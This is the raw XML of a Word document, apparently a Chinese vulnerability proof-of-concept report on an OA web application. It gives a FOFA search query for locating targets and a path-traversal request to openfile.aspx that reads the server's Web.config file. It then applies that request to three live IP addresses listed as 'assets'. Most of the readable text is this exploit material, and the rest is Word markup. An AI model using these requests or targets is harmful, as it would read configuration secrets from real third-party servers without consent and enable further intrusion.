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fofa: body="b28web/Utility/"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="3779520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poc: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url+/oa/isprit/module/openfile.aspx?Url=openfile.aspx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url+/oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>资产一：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"http://183.129.168.210/"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http://183.129.168.210/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"http://183.129.168.210/"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http://183.129.168.210/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oa/isprit/module/openfile.aspx?Url=openfile.aspx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"http://183.129.168.210/"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http://183.129.168.210/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oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="889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资产二：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"http://39.105.27.118:8086/"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http://39.105.27.118:8086/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"http://39.105.27.118:8086/"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http://39.105.27.118:8086/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oa/isprit/module/openfile.aspx?Url=openfile.aspx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"http://39.105.27.118:8086/"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http://39.105.27.118:8086/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oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2867660"/>
            <wp:effectExtent l="0" t="0" r="762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资产三：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"http://202.103.157.130:8082/"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http://202.103.157.130:8082/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"http://202.103.157.130:8082/"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http://202.103.157.130:8082/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oa/isprit/module/openfile.aspx?Url=openfile.aspx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"http://202.103.157.130:8082/oa/isprit/module/openfile.aspx?Url=../../../Web.config"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http://202.103.157.130:8082/oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config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8536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468B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2024-03-25T13:05:01Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-25T13:12:25Z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E9011362FE4545A38915DF61F6F361F0_12</vt:lpwstr>
  </property>
</Properties>
</file>